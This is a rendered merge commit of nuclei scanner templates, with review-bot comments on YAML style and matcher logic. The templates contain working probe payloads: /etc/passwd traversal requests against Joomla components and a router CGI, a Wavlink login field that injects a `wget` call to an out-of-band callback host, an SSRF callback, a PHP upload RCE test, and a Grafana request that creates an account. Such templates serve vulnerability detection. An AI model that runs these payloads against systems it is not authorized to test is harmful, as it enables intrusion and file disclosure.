Merge remote-tracking branch 'origin/master' into dynamic_attributes
commit
dc4cc62629
|
@ -26,7 +26,7 @@ jobs:
|
|||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
|
||||
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei
|
||||
shell: bash
|
||||
|
||||
- name: Template Validation
|
||||
|
|
|
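Review bot: The `go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei` line (taken as the new side, since the `@dev` form prints first and the rendering has lost its markers) carries no version suffix, so every workflow run installs whichever nuclei release is current at that moment and template validation is not reproducible. Pin the validator, e.g. `go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@<pinned-tag>`, and bump it deliberately. Separately, `GO111MODULE: on` is an unquoted YAML 1.1 boolean; write `GO111MODULE: "on"` so generic parsers and yamllint read it as the string Go expects. The step this hunk edits begins before the hunk.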
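--- /dev/null
+++ b/<path not shown on page>
@@ -0,0 +1,27 @@
+id: CVE-2010-1533
+
+info:
+name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion
+author: daffainfo
+severity: high
+description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+reference:
+- https://www.exploit-db.com/exploits/12142
+- https://www.cvedetails.com/cve/CVE-2010-1533
+tags: cve,cve2010,joomla,lfi
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"
+
+matchers-condition: and
+matchers:
+
+- type: regex
+regex:
+- "root:.*:0:0"
+
+- type: status
+status:
+- 200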
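Review bot: `tags: cve,cve2010,joomla,lfi` here and `tags: cve,cve2010,lfi,joomla` in the CVE-2010-2036 template added by the same commit order the same four tags differently; a fixed order (cve, year, product, class) keeps tag lists greppable and diff-stable, so the second template should also read `tags: cve,cve2010,joomla,lfi`. Both templates' regex matchers rely on nuclei's default of matching the response body; an explicit `part: body` under `regex:` documents that and matches the CVE-2021-38751 template in this commit.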
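--- /dev/null
+++ b/<path not shown on page>
@@ -0,0 +1,27 @@
+id: CVE-2010-2036
+
+info:
+name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
+author: daffainfo
+severity: high
+description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+reference:
+- https://www.exploit-db.com/exploits/34004
+- https://www.cvedetails.com/cve/CVE-2010-2036
+tags: cve,cve2010,lfi,joomla
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
+
+matchers-condition: and
+matchers:
+
+- type: regex
+regex:
+- "root:.*:0:0"
+
+- type: status
+status:
+- 200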
@ -12,7 +12,6 @@ requests:
|
|||
- |
|
||||
POST /rest/issueNav/1/issueTable HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
|
||||
Connection: Close
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
|
||||
X-Atlassian-Token: no-check
|
||||
|
|
|
@ -14,16 +14,12 @@ requests:
|
|||
- |
|
||||
POST /cgi-bin/login.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://{{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
|
||||
newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
|
|
|
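Review bot: `Origin: http://{{Hostname}}` hard-codes the plain-http scheme, so on an HTTPS target the Origin header will not match the request's actual origin; the other raw requests in this commit use `Origin: {{BaseURL}}`, which follows the target's scheme, and this line should do the same. The inline comment `# Confirms the HTTP Interaction` on the `part: interactsh_protocol` matcher is only accurate if the matched words pin the protocol to http; those words are outside the hunk, so confirm or reword the comment. The raw request block begins before the hunk and the matcher list continues past it.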
@ -15,8 +15,6 @@ requests:
|
|||
POST /dfsms/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Connection: close
|
||||
Content-Length: 66
|
||||
|
||||
|
|
|
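Review bot: `Content-Length: 66` is a hand-maintained value in a raw request whose body lies outside this hunk; if the body is ever edited the header silently goes stale and the server may truncate or reject the request. Nuclei's HTTP client ordinarily derives Content-Length from the body it sends, so the explicit header is likely redundant — confirm against the template's request settings and drop it, or add `# must equal the byte length of the body below` beside it. The request block begins before and ends after the hunk.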
@ -14,8 +14,6 @@ requests:
|
|||
GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oob
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft
|
||||
reference:
|
||||
- https://proxylogon.com/#timeline
|
||||
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||
|
|
|
@ -18,24 +18,12 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic YWRtaW46YWRtaW4=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
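Review bot: The `GET /log_download.cgi?type=../../etc/passwd` request that authenticates with `Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=` encodes a guest default credential, and nothing in the hunk says so; the twelve removed lines look like the second, admin-credentialed copy of the same request, but that is inferred from the line counts rather than from markers, so verify which request survives. Above the retained Authorization header add `# default guest account; the template only matches while that credential is still enabled`, so the precondition is visible to anyone triaging results. The request list begins before the hunk and the matchers continue after it.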
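--- /dev/null
+++ b/<path not shown on page>
@@ -0,0 +1,34 @@
+id: CVE-2021-38751
+
+info:
+name: ExponentCMS <= 2.6 Host Header Injection
+author: dwisiswant0
+severity: medium
+description: |
+A HTTP Host header attack exists in ExponentCMS 2.6
+and below in /exponent_constants.php. A modified HTTP
+header can change links on the webpage to an arbitrary value,
+leading to a possible attack vector for MITM.
+reference:
+- https://github.com/exponentcms/exponent-cms/issues/1544
+- https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64
+tags: cve,cve2021,exponentcms
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/"
+- "{{BaseURL}}/login/showlogin"
+headers:
+Host: "{{randstr}}.tld"
+
+matchers-condition: and
+matchers:
+- type: regex
+regex:
+- (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld
+part: body
+
+- type: status
+status:
+- 200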
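Review bot: The regex entry `- (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld` is a plain, unquoted scalar containing backslashes, a double quote and `?:` groups; it parses today, but any later edit that introduces `: ` or ` #` would silently change its meaning, and every other regex in this commit is quoted. Single-quote it: `- '(EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld'`. The description's opening `A HTTP Host header attack` should read `An HTTP Host header attack`.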
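--- a/<path not shown on page>
+++ /dev/null
@@ -1,23 +0,0 @@
-id: exchange-login
-
-info:
-name: Microsoft Exchange login page
-author: dhiyaneshDK
-severity: info
-reference: https://www.exploit-db.com/ghdb/6739
-tags: panel
-
-requests:
-- method: GET
-path:
-- '{{BaseURL}}/owa/auth/logon.aspx'
-
-matchers-condition: and
-matchers:
-- type: word
-words:
-- '<title>Exchange Log In</title>'
-- '<title>Microsoft Exchange - Outlook Web Access</title>'
-- type: status
-status:
-- 200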
@ -15,7 +15,6 @@ requests:
|
|||
headers:
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Language: en-US,en;q=0.9,hi;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
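--- /dev/null
+++ b/<path not shown on page>
@@ -0,0 +1,35 @@
+id: grafana-public-signup
+
+info:
+name: Grafana Public Signup
+author: pdteam
+severity: medium
+tags: grafana,intrusive
+
+requests:
+- raw:
+- |
+POST /api/user/signup/step2 HTTP/1.1
+Host: {{Hostname}}
+content-type: application/json
+Origin: {{BaseURL}}
+Referer: {{BaseURL}}
+
+{"username":"nuclei_{{randstr}}","password":"{{randstr_1}}"}
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "User sign up completed successfully"
+
+- type: word
+words:
+- "grafana_sess"
+- "grafana_user"
+condition: and
+part: header
+
+- type: status
+status:
+- 200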
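Review bot: The `info` block has no `description` or `reference`, yet this is the one template in the commit with a lasting side effect: the `POST /api/user/signup/step2` body registers a user named `nuclei_<random>` with a random password on the target and never removes it, which is presumably why it carries the `intrusive` tag. Add a description stating that (account creation, no cleanup, run only against systems you are authorized to modify) and a reference to the Grafana configuration option that enables public sign-up, so anyone selecting templates by tag knows what `intrusive` covers here. `content-type: application/json` is the only lower-cased header name in the commit; `Content-Type` keeps it consistent with the other raw requests.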
@ -2,7 +2,7 @@ id: springboot-env
|
|||
|
||||
info:
|
||||
name: Detect Springboot Env Actuator
|
||||
author: that_juan_,dwisiswant0,wdahlenb
|
||||
author: that_juan_,dwisiswant0,wdahlenb,philippedelteil
|
||||
severity: low
|
||||
description: Sensitive environment variables may not be masked
|
||||
tags: springboot,exposure
|
||||
|
@ -36,5 +36,6 @@ requests:
|
|||
- "application/json"
|
||||
- "application/vnd.spring-boot.actuator"
|
||||
- "application/vnd.spring-boot.actuator.v1+json"
|
||||
- "application/vnd.spring-boot.actuator.v2+json"
|
||||
condition: or
|
||||
part: header
|
||||
|
|
|
@ -2,30 +2,31 @@ id: microsoft-exchange-server-detect
|
|||
|
||||
info:
|
||||
name: Microsoft Exchange Server Detect
|
||||
author: pikpikcu
|
||||
author: pikpikcu,dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
|
||||
description: |
|
||||
Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
|
||||
description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, using Outlook Web App path data.
|
||||
tags: microsoft,exchange,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/owa/auth/logon.aspx"
|
||||
|
||||
matchers-condition: and
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
|
||||
part: all
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Exchange Log In</title>'
|
||||
- '<title>Microsoft Exchange - Outlook Web Access</title>'
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
part: header
|
||||
kval:
|
||||
- X-Owa-Version
|
||||
- X_Owa_Version
|
||||
|
|
|
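Review bot: Switching to `matchers-condition: or` while keeping the `- type: status` / `status:` / `- 200` matcher means a bare HTTP 200 for `/owa/auth/logon.aspx` now satisfies the template on its own, so any host that answers 200 for unknown paths (catch-all routing, captive portals, WAF landing pages) is reported as Exchange; `or` only makes sense across the regex and word matchers, which carry the actual evidence. Drop the status matcher (those three lines), or keep `and` and fold the two `<title>` strings into the regex alternation so status plus one fingerprint is required. The `X-Owa-Version` extractor is unaffected either way.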
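--- /dev/null
+++ b/<path not shown on page>
@@ -0,0 +1,26 @@
+id: caucho-resin-info-disclosure
+
+info:
+name: Caucho Resin Information Disclosure
+author: pikpikcu
+severity: info
+reference: https://www.exploit-db.com/exploits/27888
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" # Version: 3.0.17/3.0.18
+- "{{BaseURL}}/%20../web-inf/web.xml" # Version: 3.1.1
+
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<web-app"
+- "</web-app>"
+part: body
+condition: and
+
+- type: status
+status:
+- 200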
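Review bot: This template has no `tags` entry under `info`, so it is invisible to tag-based selection (the `-tags` filter and the workflow `- tags:` form used elsewhere in this commit), and it is the only new template here without one; add for example `tags: caucho,resin,exposure` (a constructed value — align it with the repository's tag vocabulary). `reference:` is a bare scalar while the other new templates use a list; `reference:` followed by `- https://www.exploit-db.com/exploits/27888` keeps the schema uniform. Both paths read a deployment descriptor from the server, and `severity: info` understates an unauthenticated configuration-file read — `low` would match how `springboot-env` in this commit rates an exposure of the same kind.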
@ -24,26 +24,19 @@ requests:
|
|||
<?php echo md5('rce_test');?>
|
||||
----------------------------835846770881083140190633--
|
||||
|
||||
- |
|
||||
GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: path
|
||||
group: 1
|
||||
internal: true
|
||||
part: body
|
||||
regex:
|
||||
- '/Uploads\\(.*?)"\,"success"'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '3c7cb9f46815a790686b857fdbc4295a'
|
||||
- '"url":"http:'
|
||||
- '"success":1'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- '.url'
|
|
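Review bot: The extractor named `path` is `internal: true` and its capture group is consumed by the later `GET /Public/Uploads{{url_decode("§path§")}}` line, but nothing in the hunk says so; the regex `'/Uploads\\(.*?)"\,"success"'` is single-quoted, where no escaping takes place, so the pattern requires a literal backslash after `/Uploads` — plausible for a Windows-style stored path, but worth stating. Add above the extractor `# captures the server-side upload path; fed to the follow-up GET via §path§ (internal, not reported)`. Which of the two `extractors:` blocks and the duplicated `- 200` lines survive on the new side cannot be told from this rendering, so please confirm the final file has a single extractor list per request. The request list begins before the hunk.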
@ -6,12 +6,8 @@ info:
|
|||
description: A simple workflow that runs all Grafana related nuclei templates on a given target.
|
||||
tags: workflow
|
||||
|
||||
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
|
||||
# Old workflows still remains valid, and will be working with all nuclei versions.
|
||||
|
||||
workflows:
|
||||
|
||||
- template: exposed-panels/grafana-detect.yaml
|
||||
|
||||
subtemplates:
|
||||
- template: default-logins/grafana/grafana-default-credential.yaml
|
||||
- tags: grafana
|
||||
|
|
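Review bot: If `- tags: grafana` under `subtemplates:` is the new form (the four dropped lines are consistent with the two version comments and the explicit `grafana-default-credential.yaml` entry being replaced by it, but the rendering shows no markers), the workflow now runs every template tagged `grafana`, which after this commit includes `grafana-public-signup` — tagged `grafana,intrusive` — and that template creates an account on the target. A tag selector has no exclude clause, so either keep explicit `- template:` entries or document the side effect with `# runs all grafana-tagged templates, including intrusive ones (public signup creates a user)` above the line and mention it in the description. The `workflows:` block continues past the hunk.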